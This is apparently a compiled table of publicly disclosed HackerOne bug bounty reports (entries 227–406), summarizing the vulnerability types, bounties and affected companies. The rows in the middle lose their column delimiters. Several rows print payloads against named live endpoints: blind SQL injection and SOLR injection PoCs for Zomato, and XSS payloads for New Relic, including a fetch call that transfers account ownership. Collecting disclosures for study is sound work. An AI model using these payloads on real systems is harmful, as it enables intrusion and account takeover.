| 227 | CSRF | Image injection on www.rockstargames.com/IV/screens/1280x720Image.html can be combined with other issues to leak user tokens. | $500 | Rockstar Games | https://hackerone.com/reports/784101 |
| 228 | Information disclosure | Image injection on https://www.rockstargames.com/careers#/offices/. Combined in a chain with other attacks, could lead to leaking user tokens. | $500 | Rockstar Games | https://hackerone.com/reports/491654 |
| 229 | Insufficient Session Expiration | No session invalidation after logout. Attacker can reuse known tokens | $100 | Visma | https://hackerone.com/reports/808731 |
| 230 | Remote File Inclusion | Remote file inclusion through downloading a file from chat. Uses path traversal to extract anywhere, and it can be hidden by setting a title for the file. | $5000 | Keybase | https://hackerone.com/reports/713006 |
| 231 | Insecure Design Principles | Using the RTLO (Right-to-Left Override) character allows spoofing the URL displayed when navigating out of rinkerboats.vanillacommunities.com, leading to potential phishing / other attacks. | $150 | Vanilla | https://hackerone.com/reports/563268 |
| 232 | XSS | Stored XSS in the Customer Number field. | $250 | Visma | https://hackerone.com/reports/882189 |
| 233 | Information disclosure | CodeQL query to detect J2EE servers with directory listing enabled, potentially allowing for source code disclosure. | $1800 | GitHub Security Lab | https://hackerone.com/reports/909374 |
| 234 | XSS | XSS in account.mail.ru due to unsafe handling of GET parameter (User-assisted == requires user interaction?) | $1000 | Mail.ru | https://hackerone.com/reports/889874 |
| 235 | Information leak | MySQL credentials leaked in publicly available config file | $150 | Mail.ru | https://hackerone.com/reports/879389 |
| 236 | SSRF | SSRF through the relap.io function allowing for fetching external resources, giving access to the production network in a transparent manner (non-blind) | $1700 | Mail.ru | https://hackerone.com/reports/739962 |
237XSSStored XSS by authenticated user to all other users through the /wp-admin/edit.php?post_type=forum endpoint$225WordPresshttps://hackerone.com/reports/881918
238Information leakA misconfigured web directory disclosed files that showed NordVPNs public proxy list and corresponding port numbers$50NordVPNhttps://hackerone.com/reports/791826
239Privilege EscalationAn attacker can kick out any other member of any organization, given that they know the membership ID of the user. This is due to an IDOR in the delete membership functionality, which can be triggered by: DELETE /api/memberships/id$100Heliumhttps://hackerone.com/reports/810320
240Command InjectionReflected XSS in certain endpoints allows account takeover. Attackers can also perform sensitive actions on behalf of authenticated users.$594Ubiquiti Inc.https://hackerone.com/reports/661647
241Command InjectionCertain end-points are vulnerable to command injection when using specifically crafted input, leading to RCE. This vulnerability can be triggered through other vulnerabilities, like XSS and CSRF.$6839Ubiquiti Inc.https://hackerone.com/reports/703659
242Logic bugBat files and other malicious executables (or any other filetypes and content) can be concealed as normal content, like .csv files by including illegal characters as content.$1500Slackhttps://hackerone.com/reports/833080
243XSSXSS through unsafe URI handling in ASP.net on base starbucks.com domain$500Starbuckshttps://hackerone.com/reports/881115
244BruteforceUser passwords can be brute forced due to lack of rate limiting$700Twitterhttps://hackerone.com/reports/854424
245Request Smugglingconsole.helium.com is vulnerable to CL.TE request smuggling.$500Heliumhttps://hackerone.com/reports/867952
246CSRFCSRF allowing an attacker to import any novel to the victims chatstory (pixiv service)$500Pixivhttps://hackerone.com/reports/534908
247Improper Authentication2FA bypass by not supplying a 2FA code. Likely lack of null check. Vulnerable request is likely something like this: "email":"attack@lol.com","2FA":""$1000Glassdoorhttps://hackerone.com/reports/897385
248Logic BugUsers are able for forge requests, leading to being able to spawn additional units at will. This is done through (what looks like) a leaked secret and a lack of proper server side validation.$1100InnoGameshttps://hackerone.com/reports/802636
249Open RedirectOpen redirect requiring user to click in order to work$100LocalTapiolahttps://hackerone.com/reports/194017
250Insecure design principlesCodeQL query to check for improper SSL certificates$1800GitHubhttps://hackerone.com/reports/917454
251Command injectionCodeQL query to detect OGNL injection$2300Githubhttps://hackerone.com/reports/917455
252Use after freeA use-after-free vulnerability exists in the IPV6 option of setsockopt, as it is possible to race and free the struct_ip6_pktopts buffer (TOCTOU) while it is being handled by ip6_setpktopt. This struct contains pointers that can be used for R/W primitives in the kernel. Combining this vulnerability with a known WebKit issue allows for easy exploitation.$10,000PlayStationhttps://hackerone.com/reports/826026
253CSRF/community/create-post.js was vulnerable to CSRF attacks, allowing an attacker to spam the community boards as other users. This attack was only possible through Chrome.$150Rockstar Gameshttps://hackerone.com/reports/487378
254CSRFhttps://www.rockstargames.com/reddeadonline/feedback/submit.json was vulnerable to CSRF attacks and could be exploited through a remote server. This attack was only possible through Chrome.$150Rockstar Gameshttps://hackerone.com/reports/796295
255LFILFI of files with .md extension from /var/www/dashboard/new/ was possible. In addition, remote file inclusion from github was possible due to the default value of $docs_path, leading to XSS.$300TTS Bug Bountyhttps://hackerone.com/reports/895972
256Logic BugUnlimited file upload in the image assigned to a contact leads to XSS by uploading malicious SVG.$100Nextcloudhttps://hackerone.com/reports/808287
257CRLF InjectionMalicious users (non-admins) can write to memcached when using a malicious URL as a share.$100Nextcloudhttps://hackerone.com/reports/592864
258HTTP Request SmugglingCL.TE based request smuggling on api.zomato.com leading to account takeover among other issues. This issue was only reproducible when using the DELETE verb. As such, make sure to test for all HTTP verbs when checking for Request Smuggling$5000Zomatohttps://hackerone.com/reports/771666
259XSSReflected XSS on https://www.tumblr.com/abuse/start?prefill=<base64PL>. It only works on Firefox version 69 or lower.$250Automattichttps://hackerone.com/reports/915756
260Logic BugCodeQL query to detect insecure use of postMessage. It checks if indexOf or startsWith is used to check MessageEvent.origin, which can lead to XSS or other issues.$1800GitHubhttps://hackerone.com/reports/920285
261DoSDoS by sending many requests to apply for a certain job, due to relying on responses from a 3rd party server before returning.$100Maximumhttps://hackerone.com/reports/892615
262Session FixationAn issue where not all sessions being terminated when the password was reset.$50Moneybirdhttps://hackerone.com/reports/743518
263Improper authenticationhttps://werkenbijderet.nl/vacature-alert endpoint did not have proper rate limiting implemented, leading to being able to send thousands of mails within 10 minutes.$100Maximumhttps://hackerone.com/reports/882942
264SSRFBeing able to call all internal classes, functions and parameters due to everything being declared public. This leads to blind SSRF through Gopher protocol.$300TTS Bug Bountyhttps://hackerone.com/reports/895696
265IDORRead only user can delete other users through IDOR$50Heliumhttps://hackerone.com/reports/888729
266Brute ForceIt is possible to brute force the login prompt of app.mopub.com due to only having IP based rate limiting. It should have CAPTCHA or block all access to the locked out account, not just add restrictions to the violating IP (as changing IPs is easy).$420Twitterhttps://hackerone.com/reports/819930
267XSSReflected XSS in GET parameter$300Mail.ruhttps://hackerone.com/reports/848742
268Improper access controlA partner’s superuser account could access information of drivers belonging to other partners, including passport and drivers license data$8000Mail.ruhttps://hackerone.com/reports/863983
269Information leakBot Token for ICQ was leaked in GIT commit data for opensource JIRA plugin$150Mail.ruhttps://hackerone.com/reports/902064
270Logic bugIt was possible to create accounts with nicknames belonging to existing accounts$150Mail.ruhttps://hackerone.com/reports/824973
271XSSViewing a malicious SVG lead to access to local files (LFI?) on certain iOS versions due to cross-application scripting in the Mail.ru iOS Mail app$1000Mail.ruhttps://hackerone.com/reports/900543
272Race ConditionMalicious applications could create multiple valid OAUTH sessions by abusing a race condition.$250Razerhttps://hackerone.com/reports/699112
273IDORIDOR in the stocky application allows for changing columns of other users$750Shopifyhttps://hackerone.com/reports/853130
274Account TakeoverIf staff/the store owner has yet to register a google account to his Shopify ID, and you have privileges to change their registered email, you can take over the account by setting their email to your gmail address. Knowing this means you can takeover accounts by having the admin be exposed to an xss performing this operation. It only works with Google Apps enabled.$2000Shopifyhttps://hackerone.com/reports/892904
275Improper authenticationThe Stocky application did not have any permission checks to download purchase orders, leading to anyone being able to download the orders.$500Shopifyhttps://hackerone.com/reports/802286
276CRLF InjectionIn the Synthetics “Ping” functionality, you can insert newline characters, resulting in almost full control over the email functionality. You are able to send emails to anyone, with any content. The only limitation is a small one in the “Subject” field.$500New Relichttps://hackerone.com/reports/347439
277IDORThe selectAddressId in the cookie combined with the delivery_subzone in the GET request, allows for unauthenticated enumeration of all addresses registered to users. This cannot be tied to a specific user. This is due to the backend disclosing the full, stored address of a user, given that the delivery_subzone matches that associated with the selectAddressId without any further authentication$1500Zomatohttps://hackerone.com/reports/514897
278Logic bugDue to not sufficiently protecting which apps can retrieve the token in the authentication flow, it is possible for a malicious application to take over the account of the user. This requires a malicious app preinstalled on the victims device to be successful.$500Shopifyhttps://hackerone.com/reports/855618
279Improper authenticationAn attacker can generate app tokens through the adminGenerateSession mutation in the admin panel, as a staff member with no permissions. This would give access to a small subset of installed apps, limited to the current shop.$2000Shopifyhttps://hackerone.com/reports/898528
280XSSStored XSS in admin interface through “evaluation of purchase process”-window$1500Mail.ruhttps://hackerone.com/reports/874387
281DoSCertain files in /etc/ are writable. For example hosts, hostname and resolve.conf. While the last two seems to have special handling, /etc/hosts is inherently vulnerable. This leads to being able to DoS a service by writing large amounts of data to the file.$1000Kuberneteshttps://hackerone.com/reports/867699
282Logic bugGraphQL query for finding incorrect hostname comparison. This is especially prevalent in Android applications.$1500GitHubhttps://hackerone.com/reports/929288
283Logic bugMisconfiguration lead to being able to get SmartDNS for free for longer than it should be.$700NordVPNhttps://hackerone.com/reports/925757
284XXEXXE on starbucks.com.sg/RestAPI/* leading to arbitrary file read$500Starbuckshttps://hackerone.com/reports/762251
285Account TakeoverDue to improper authentication when setting up 2FA, it is possible to takeover an account given that you know the USER ID. This is not likely to leak and as such reduces the impact of this vulnerability.$100Heliumhttps://hackerone.com/reports/810880
286Information DisclosureIt was possible to view thumbnails of private videos through attacking the API$750Pornhubhttps://hackerone.com/reports/138703
287DoSImproper handling of renaming HackerOne groups for managing access rights for programs, leads to excessive resource use which may lead to DoS$2500HackerOnehttps://hackerone.com/reports/880187
288DoSDoS through recursive evaluation. Can be done remotely by an attacker with elevated privileges.$200Kuberneteshttps://hackerone.com/reports/882923
289Logic bugBy tampering requests regarding which retailers you can earn cashback from to be an empty list, you can earn cashback from all retailers on the platform. Normally premium users can only select 6 and normal users can only select 3. This can only be set once, but using this vulnerability you can switch at any time.$1000Curvehttps://hackerone.com/reports/672487
290Use of weak PRNGGrammarly Keyboard for Android used weak PRNG allowing a malicious app installed on the device to guess the PKCE code value and steal the OAUTH access token of a user. Fixed by changing to SecureRandom$2000Grammarlyhttps://hackerone.com/reports/824931
291Improper AuthenticationH1 SAML implementation allows for re-using SAML response for up to 10 minutes, allowing for increased risk in case an attacker can ever intercept or otherwise compromise such a request.$500HackerOnehttps://hackerone.com/reports/888930
292DoSDoS of account (for Chrome) when viewing a tweet containing the link twitter.com/%00$560Twitterhttps://hackerone.com/reports/921286
293IDORIDOR allows user to access pictures from other users, including EXIF data.$200IRRCloudhttps://hackerone.com/reports/906907
294Information leakAfter the policy_markdown_html was added inside the team Graphql query, it was possible to enumerate if public programs also had private programs. In case they did, you could also see their internal policy.$2500HackerOnehttps://hackerone.com/reports/877642
295PhishingAbility to spoof interface elements through adding tags or attributes in calendar events at calendar.mail.ru$150Mail.ruhttps://hackerone.com/reports/847473
296Code injectionCodeQL query for detecting possible template injections in Python$2300Githubhttps://hackerone.com/reports/944359
297XSSBy adding a link in a post and manually editing out a portion (denied:), then reblogging the post, the XSS will execute after the victim clicks the link (on the reblogged post).$350Automattichttps://hackerone.com/reports/882546
298Command InjectionSince GitLab allows for code injection through Mermaid, you can achieve arbitrary PUT requests in the context of the victim through this command injection. The victim has to have the required privilege to perform the action for the attack to succeed.$3000Gitlabhttps://hackerone.com/reports/824689
299SQLiAn SQL Injection existed in a Razer Gold asset due to using an outdated instance of PHPlist. The injection point is the body parameter name and not the value!$2000Razerhttps://hackerone.com/reports/824307
300Code injectionDue to a vulnerability in how the executable launched related executables, it was possible to escalate privileges by abusing this issue. (Likely similar to DLL injection or unquoted path issues.) The issue was in a Cortex related service.$750Razerhttps://hackerone.com/reports/769684
301IDORAn alternate site shared database and cookie credentials with card.starbucks.com.sg. By exploiting the alternate site, the hacker could copy over the cookie value and take over the account on starbucks.$6000Starbuckshttps://hackerone.com/reports/876300
302Command injectionAWS S3 bucket takeover of multiple buckets. The buckets were still referenced in a test script and as such could have resulted in RCE.$12,500Mapboxhttps://hackerone.com/reports/329689
303CSRFLogin CSRF via OATH code in lootdog.io allows an attacker to replace a user’s session with the attackers session.$150Mail.ruhttps://hackerone.com/reports/892986
304DoSDue to relying on AJV, and also using allErrors:true, Fastify is vulnerable to DoS when there is potentially slow matching patterns or if uniqueItems is in the schema.$250Node.js third-party moduleshttps://hackerone.com/reports/903521
305DoSBy submitting a very long password, the hashing algorithm on the server will take a lot of resources and potentially result in DoS due to memory exhaustion.$100Nextcloudhttps://hackerone.com/reports/840598
306Information DisclosureDue to lack of access control in ajaxgetachievementsforgame, it is possible to see achievement names, display names and descriptions for unreleased games if you find a user who has the achievements for those unreleased apps (beta tester or similar)$750Valvehttps://hackerone.com/reports/835087
307Open RedirectReverse tabnabbing (changing location of the original page page when opening a link in a new tab) was possible in the printing source document images functionality.$100Visma Publichttps://hackerone.com/reports/911123
308Client side enforcement of Server-side SecurityDue to silently ignoring the content length header, it is possible to bypass the size check for S3 buckets and upload attachments of any size. The solution is to add content-length header to whitelisted headers.$500Ruby on Railshttps://hackerone.com/reports/789579
309Logic bugWhen creating a hash, the permit function does not sufficiently protect when converting using .each(), allowing for sneaking in additional parameters that should not logically be present$500Ruby on Railshttps://hackerone.com/reports/292797
310Null pointer dereferenceA lack of proper checks for user supplied data results in a null pointer dereference.$1500Open-Xchangehttps://hackerone.com/reports/827729
311Use After FreeDue to incorrectly decreasing a reference counter, by sending a lot of newline characters (“\n”) you can reach code checking the cmd-variable which has previously been freed.$500Open-Xchangehttps://hackerone.com/reports/827051
312IDORAccount takeover through IDOR in password recovery procedure$1500Mail.ruhttps://hackerone.com/reports/843160
313IDORCould disclose attributes of arbitrary sites due to a IDOR in relap.io$750Mail.ruhttps://hackerone.com/reports/749887
314XSSBy uploading a PNG with JS and XML code, and adding it to a Wiki page, it was possible to achieve stored XSS$1500GitLabhttps://hackerone.com/reports/880099
315Improper Access ControlLack of access control on the ListMembers query allowed for enumeration of members in private lists. Finding the TwitterID is difficult, but can be done by brute force by attacking different endpoints. To further show impact, it was demonstrated that x-response-time header discloses if the lists exists or not.$2940Twitterhttps://hackerone.com/reports/885539
316XSSStored XSS through the blob-viewer. The payload is in the description field.$2000GitLabhttps://hackerone.com/reports/806571
317SSRFChaining redirects in grafana allows for SSRF using any HTTP verb to any arbitrary endpoint. For more information, see Rhynorater’s talk at HactivityCon 2020.$12,000GitLabhttps://hackerone.com/reports/878779
318Logic bugBy supplying an attacker controlled link, the attacker can get a copy of the PoC, if the victim (person creating a poc) submits the details on the page. There were multiple bypasses possible due to a loosely configured regex, which was fixed.$1000BugPochttps://hackerone.com/reports/926221
319Logic bugDue to lack of association checks between 3rd party wallet IDs and user IDs, it was possible to purchase Zomato Gold memberships using other user’s 3rd party wallets, effectively having them pay for it.$2000Zomatohttps://hackerone.com/reports/938021
320Logic bugAbility to decrease payment by maximum 1 currency unit (0.99) for any purchase$150Zomatohttps://hackerone.com/reports/927661
321Improper access controlAccess control issue due to not correctly checking permissions in the active session for the user$100Visma Publichttps://hackerone.com/reports/812143
322Information leakAbility to see error message related to character encoding from SQL operation by adding the poop-emoji to the email field during registration$100Unikrnhttps://hackerone.com/reports/866271
323SQL InjectionSOLR injection through adding \to the query.$100Zomatohttps://hackerone.com/reports/844428
324SQL InjectionBlind SQLi in res_id of /php/geto2banner. PoC is res_id=51-CASE/**/WHEN(LENGTH(version())=10)THEN(SLEEP(6*1))END&city_id=0$2000Zomatohttps://hackerone.com/reports/838855
325SQL InjectionSame as #326, but on a different endpoint: /php/widgets_handler.php. PoC: :/php/widgets_handler.php?method=getResWidgetButton&res_id=51-CASE/**/WHEN(LENGTH(​version()​)=​10​)THEN(SLEEP(6*1))END$2000Zomatohttps://hackerone.com/reports/836079
326Improper access controlThe food.grammarly.io site uses Meter framework, and is lacking proper authorization for sensitive endpoints. The attacker could leak user data and employee data, including access tokens, by calling the functions directly from JS (for example in dev tools)$1000Grammarlyhttps://hackerone.com/reports/745495
327SQL InjectionThe reporter identified a SOLR injection on the user_id parameter at :/v2/leaderboard_v2.json. This had low impact, but the internal team found a boolean based blind SQLi in the same codebase when investigating and rewarded the report as such.$2000Zomatohttps://hackerone.com/reports/952501
328Special element injectionSOLR injection similar to #324, but on a different endpoint. PoC :v2/red/homepage.json?lat=&lon=&city_id={!dismax+df=city_id}86&android_country=US&lang=en&android_language=en$150Zomatohttps://hackerone.com/reports/953203
329Missing authorizationMissing authorization checks lead to a user only allowed to do sales being able to record payments he was not supposed to$250Visma Publichttps://hackerone.com/reports/919008
330SSRFCodeQL query for detecting SSRF issues in Golang libraries and code$1800Github Security labhttps://hackerone.com/reports/956296
331LDAP InjectionCodeQL query for detecting LDAP injections in Java, supporting Java JNDI, UnboundID, SPring LDAP and Apache LDAP API$2500Github Security labhttps://hackerone.com/reports/956295
332XSSStored XSS through the chartbuilder in one.newrelic.com. Payload: SELECT '“><img src=x onerror=alert(document.domain)> "' Style=position\' FROM SyntheticCheck$2500New Relichttps://hackerone.com/reports/634692
333Information leakAble to view full name of users who are not yet part of your account. This can be achieved by creating a note, viewing it and trying to share it with the invited account.$750New Relichttps://hackerone.com/reports/476958
334Privilege escalationRestricted users are able to delete Key transaction tags through the GUI even though they should only have READ-access.$750New Relichttps://hackerone.com/reports/638685
335Privilege escalationAn unrestricted user is able to view the application token for a mobile app by directly visiting the /deploy endpoint for the app.$500New Relichttps://hackerone.com/reports/479139
336IDORAccess to a subset of a victims Insights Dashboards through a GraphQL query with insufficient validation$1500New Relichttps://hackerone.com/reports/765565
337Logic bugAbility to buy PRO subscriptions for reduced prices by tampering the pr. unit price$203.5New Relichttps://hackerone.com/reports/783688
338Improper access controlRestricted users are able to delete NerdStorage documents created/owned by any user on that account, through GraphQL query.$600New Relichttps://hackerone.com/reports/766145
339Improper access controlA restricted user was able to update the Aodex target for an application by abusing a GraphQL mutation without proper validation and authorization$626New Relichttps://hackerone.com/reports/776449
340Violation of secure design principlesIt was not possible to delete API keys in the application, even though the GUI said it was possible and the action succeeded. This was true even for users with an Admin/Owner role.$500New Relichttps://hackerone.com/reports/782703
341Code injectionBy abusing a CSRF vulnerability in the admin panel, the reporters were able to achieve stored XSS. Then, using the stored XSS vulnerability, they managed to escalate the vulnerability to RCE. The attack required Social Engineering of a WordPress Admin (to click the initial link) to be successful$506New Relichttps://hackerone.com/reports/941421
342Improper access controlA test endpoint for Synthetic monitors was found by the reporter. It did not validate permissions of the user, causing low privileged users to be able to create monitors using Secure Credentials$500New Relichttps://hackerone.com/reports/788499
343IDORThe reporter found a way to link an account with any Partnership as long as the ID was known. It was resolved by adding proper validation.$695New Relichttps://hackerone.com/reports/786109
344XSSStored XSS in the Synthetics private locations list. Both the Label and Description fields were vulnerable. PoC: </script><script>alert(document.domain)</script>$2500New Relichttps://hackerone.com/reports/680240
345Improper access controlRestricted users are able to create, edit and remove tags from the NerdGraph entities.$750New Relichttps://hackerone.com/reports/757957
346XSSStored XSS in the “Position” field when applying for “Support/Moderator” jobs at recruit.innogames.de$500Innogameshttps://hackerone.com/reports/917250
347IDORAn endpoint for testing Synthetics monitors without proper validation allowed monitors from other accounts to run on your account, given that they knew the monitors ID (on victims account)$2500New Relichttps://hackerone.com/reports/787886
348XSSStored XSS across accounts through the embedded charts page. The vulnerable field is chart_title and the PoC is: </script><script>alert(document.domain)</script>. Multiple bypasses was also found for this issue$3625New Relichttps://hackerone.com/reports/709883
349XSSStored XSS in the transactionName field of the Beta map functionality. PoC is a simple "-alert(document.domain)-"$2500New Relichttps://hackerone.com/reports/667770
350XSSCross account stored XSS by injecting the payload into a chart, when it is displayed inside a note. The exploit abuses the href attribute by using a javascript:alert()" payload. This XSS requires no user interaction.$4250New Relichttps://hackerone.com/reports/507132
351Improper access controlThere was a misconfiguration in CORS-policy where all assets trusted the domain nr3.nr-assets.net where users can upload arbitrary content. (For example Nerdlet artifacts) This allows an attacker to upload malicious files of arbitrary types and execute arbitrary actions on behalf of the victim in various ways due to the incorrect configuration. Valid fixes are either to move user content to another sandbox domain or to amend the CORS policy.$3125New Relichttps://hackerone.com/reports/751699
352Information disclosureCORS misconfiguration allows requests from sandbox containing user apps, leading to potential disclosure of nerdpacks, nerdlets, and launcher ID’s, and also source code of the victims app.$625New Relichttps://hackerone.com/reports/746786
353XSSStored XSS in admin interface when creating a new alert. By formatting the url as: user:password@domain.com the server accepts the payload, which is: javascript:fetch("https://rpm.newrelic.com/user_management/accounts/{ACCOUNT_ID}/update_primary_admin?value={ATTACKER_ID}",{method:"PUT",headers:{"X-Requested-With":"XMLHttpRequest"}}).then(function(_){alert("you_have_lost_your_ownership");close()})//@asd.com$1337New Relichttps://hackerone.com/reports/605845
354Memory CorruptionMissing best practices like having ASLR (Address Space Layout Randomization), DEP (Data Execution Prevention) and CFG (Control Flow Guard) enabled is lacking$50Nextcloudhttps://hackerone.com/reports/380102
355DoSDenial of Service by poisoning the cache with invalid CORS Header, due to an endpoint echoing back and setting the CORS Allow-OriginHeader to the supplied “origin” value.$200Automattichttps://hackerone.com/reports/921704
356XSSWhen connecting to an invalid website, it launches a pop-up which can contain attacker-controlled content. By using file-scheme, for example, you can trick users into launching arbitrary files on the local machine$100Nextcloudhttps://hackerone.com/reports/685552
357Path TraversalThe linux client is vulnerable to an attack where an administrator can inject path traversal payloads into filenames (../) in order to write files to arbitrary locations within the control of the nextcloud app, on the victims machine. It only allows for creating new files, not modify existing ones, and needs to be continously exploited to have effect.$250Nextcloudhttps://hackerone.com/reports/590319
358SSRFSSRF in PlantUML staging server, due to accepting the !include function.$100GitLabhttps://hackerone.com/reports/689245
359XSSStored XSS due to improper filtering of attributes after admin has edited them.$650WordPresshttps://hackerone.com/reports/633231
360XSSStored XSS due to improper filtering of attributes after admin has edited them. Different case from #359$650WordPresshttps://hackerone.com/reports/497724
361XSSStored XSS in First and Last Name field for “Staff” account$3000Shopifyhttps://hackerone.com/reports/948929
362Privilege EscalationAn attacker can register an account with an email, get permissions and then be deleted. After being deleted, by accessing accounts.shopify.com with the now deleted account, you still have access.$1000Shopifyhttps://hackerone.com/reports/870001
363Information disclosureA bug in graphql access controlled allowed an attacker with “customer” permissions to leak additional data they should not have access to, from orders.$1500Shopifyhttps://hackerone.com/reports/882412
| # | Category | Description | Bounty | Company | Report |
|---|---|---|---|---|---|
| 364 | Information disclosure | By first obtaining an API key and then querying for specific data, staff members can access data they are not supposed to have access to. | $1000 | Shopify | https://hackerone.com/reports/901775 |
| 365 | Information disclosure | Users without any permission can access certain store information through a GraphQL query. | $500 | Shopify | https://hackerone.com/reports/409973 |
| 366 | XSS | Reflected XSS through the skuNo and skuImgUrl parameters at https://www.istarbucks.co.kr/app/getGiftStock.do | $250 | Starbucks | https://hackerone.com/reports/768345 |
| 367 | Improper access control | A password reset link can be used to reset the password multiple times. | $500 | Shopify | https://hackerone.com/reports/898841 |
| 368 | IDOR | The last 4 digits of a registered credit card could be obtained through error messages on the /profile_payment/save endpoint by abusing an IDOR. | $500 | Yelp | https://hackerone.com/reports/361984 |
| 369 | IDOR | An IDOR allowed an attacker to order food on GrubHub using someone else's credit card via the /checkout/transaction_platform endpoint. | $2500 | Yelp | https://hackerone.com/reports/391092 |
| 370 | IDOR | An IDOR on the /rewards/signup endpoint allowed an attacker to associate a random credit card with their account. While the card could not be used, it allowed viewing the transaction history and cash-back amounts received. | $2000 | Yelp | https://hackerone.com/reports/358143 |
| 371 | Stack overflow | Half-Life 1 accepts command-line arguments to launch a mod or a specific game via `-game <arg>`. The argument is copied with strcpy, so an overflow is possible. | $1150 | Valve | https://hackerone.com/reports/832750 |
| 372 | Buffer overflow | By loading a malicious map file (.bsp) an attacker can achieve RCE on any victim who loads the map. This works on any GoldSrc game. | $450 | Valve | https://hackerone.com/reports/763403 |
| 373 | Buffer overflow | The spk console command has no length check before copying its argument into a stack-based buffer, leading to RCE when a victim loads a malicious .cfg file. | $350 | Valve | https://hackerone.com/reports/769014 |
| 374 | IDOR | An IDOR when creating shipping labels allows an attacker to request print labels (and presumably see the related order information) for stores they do not have access to. | $1000 | Shopify | https://hackerone.com/reports/884159 |
| 375 | Improper authentication | The getLoginStatus call in Digits allowed an attacker to retrieve OAuth credentials for any account, because domains were verified using the Referer header and a request with an empty Referer was treated as valid. | $5040 | Twitter | https://hackerone.com/reports/168116 |
| 376 | Information disclosure | CodeQL query to detect logging of potentially sensitive information in JS-based applications. | $1800 | GitHub Security Lab | https://hackerone.com/reports/963816 |
| 377 | Information disclosure | CodeQL query to detect basic authentication over plain HTTP in the java.net and Apache HttpClient libraries. Basic auth only base64-encodes the credentials, so over an unencrypted connection they are trivially recovered. | $2300 | GitHub Security Lab | https://hackerone.com/reports/963815 |
| 378 | DoS | Lodash 4.17.15 was vulnerable to prototype pollution, allowing for a potential DoS. | $250 | NodeJS 3rd party modules | https://hackerone.com/reports/864701 |
| 379 | Privacy violation | Clickjacking was possible during the payment process, allowing an attacker to trick the victim into paying for items with their stored credit card. | $400 | Yelp | https://hackerone.com/reports/391385 |
| 380 | UI redressing (clickjacking) | Multiple endpoints were vulnerable to clickjacking. | $500 | Yelp | https://hackerone.com/reports/305128 |
| 381 | UI redressing (clickjacking) | Clickjacking was possible on the /reservations endpoint, possibly allowing an attacker to leak a victim's information or cause them monetary loss. | $500 | Yelp | https://hackerone.com/reports/355859 |
| 382 | Information disclosure | It was possible to disclose all details about all pentesters invited to a test, regardless of whether they accepted. This leaks sensitive information. | $500 | HackerOne | https://hackerone.com/reports/958374 |
| 383 | XSS | Stored XSS through the dashboard builder within New Relic One. | $2500 | New Relic | https://hackerone.com/reports/626082 |
| 384 | Privilege escalation | Synthetics did not enforce the same permissions as other functionality, allowing users to have higher privileges than intended. | $750 | New Relic | https://hackerone.com/reports/387290 |
| 385 | Privilege escalation | After the switch to Zuora for managing customer subscriptions, members who do not have that access in the New Relic platform could still access the information through the Zuora API. | $900 | New Relic | https://hackerone.com/reports/501672 |
| 386 | XSS | Stored XSS via role name in a JSON chart that was part of a prerelease UI. Payload: `/*\"<sVg/oNloAd=alert(document.domain)//>\x3e` | $2500 | New Relic | https://hackerone.com/reports/520630 |
| 387 | Improper authentication | Restricted users were able to delete filter sets used by admin users at https://infrastructure.newrelic.com/accounts/{{ACC#}}/settings/filterSets | $250 | New Relic | https://hackerone.com/reports/202501 |
| 388 | Privilege escalation | By being invited as a staff member and becoming a partner, then having that permission revoked, the previous account still has access to the partner store (? hard to understand from the report). | $1500 | Shopify | https://hackerone.com/reports/911857 |
| 389 | XSS | Stored XSS when creating a menu item; the payload fires when the item is deleted. | $1000 | Shopify | https://hackerone.com/reports/887879 |
| 390 | Information disclosure | Staff members with no permissions could not access data through the web UI, but through the Android application they could access order details via the exchangeReceiptSend call. | $1000 | Shopify | https://hackerone.com/reports/917875 |
| 391 | Privilege escalation | A malicious admin can create additional admin accounts without other admins being notified or able to see them. | $500 | Shopify | https://hackerone.com/reports/962895 |
| 392 | Path traversal | Path traversal allowed an anonymous user to access arbitrary paths on the OAuth app. | $500 | Shopify | https://hackerone.com/reports/869888 |
| 393 | Violation of secure design principles | Changing the country in Account settings does not trigger HackerOne's "Your profile was recently changed" notification email. | $500 | HackerOne | https://hackerone.com/reports/961841 |
| 394 | Information disclosure | By fetching a valid token from another store, it was possible to bypass the password restriction on stores in preview mode. | $1500 | Shopify | https://hackerone.com/reports/961929 |
| 395 | XSS | Naming the folder that contains a broken theme with an XSS payload leads to XSS. This requires installing an attacker-supplied theme or write access to the file system. | $300 | WordPress | https://hackerone.com/reports/406289 |
| 396 | XSS | Self-XSS on Timeline using the javascript: protocol. | $500 | Shopify | https://hackerone.com/reports/854299 |
| 397 | Improper access control | Script Editor tokens do not expire, so anyone holding a token can still edit and add scripts even after the Script Editor application is uninstalled. If a script is renamed to an empty name, it can no longer be seen or edited except by calling the API directly. | $2000 | Shopify | https://hackerone.com/reports/915940 |
| 398 | Information disclosure | Within the same company, a user with the Auditor role could access data they should not be able to. | $100 | Visma Public | https://hackerone.com/reports/959897 |
| 399 | Privilege escalation | By navigating directly to the relevant endpoints instead of relying on the UI, a restricted user is able to create integrations with AWS even though their role forbids this. | $750 | New Relic | https://hackerone.com/reports/255685 |
| 400 | Privilege escalation | Logged in to New Relic Synthetics with no permissions, observing the requests reveals a call that returns all data about the group's monitors and permissions. | $750 | New Relic | https://hackerone.com/reports/320689 |
| 401 | IDOR | By adding a new user to your New Relic account as an admin, you could disclose their full name on the https://alerts.newrelic.com/accounts/ACCOUNT_ID/channels page. | $1500 | New Relic | https://hackerone.com/reports/344309 |
| 402 | IDOR | When creating an account for a new user, the admin cannot see the name of the account holder. This vulnerability allowed an attacker to disclose that data through the API endpoint https://alerts.newrelic.com/internal_api/1/accounts/YOURACCOUNTNUMBER/users/ | $1500 | New Relic | https://hackerone.com/reports/332381 |
| 403 | Improper access control | If a permanent maintainer creates a mirror and then removes it, any other project maintainer can create a mirror similar to the first one. This contradicts the documentation and can allow an attacker to plant backdoors or push to a repository after being removed from the project. | $3000 | GitLab | https://hackerone.com/reports/819821 |
| 404 | IDOR | By creating an account on customers.gitlab.com and linking it to the victim's account using their user ID (sequential and easy to obtain), the attacker can: 1. remove all subscriptions, 2. receive all future updates, including credit card registration, 3. use the registered information. | $3500 | GitLab | https://hackerone.com/reports/674195 |
| 405 | Privilege escalation | When a GitLab admin uses the impersonate function, the admin cookie is replaced with the user's cookie and a "Stop impersonating" button is shown to return to the admin account. This session shows up in the user's sessions overview, so if the user switches to it they can click "Stop impersonating" and gain admin access. | $10,000 | GitLab | https://hackerone.com/reports/493324 |
| 406 | Logic bug | An attacker could run arbitrary pipeline jobs as the victim: create a repository and a mirrored project with "trigger pipelines for mirror updates" enabled, invite the victim as an owner, then delete the original owner; the pipeline then executes in the context of the victim's account. | $12,000 | GitLab | https://hackerone.com/reports/894569 |
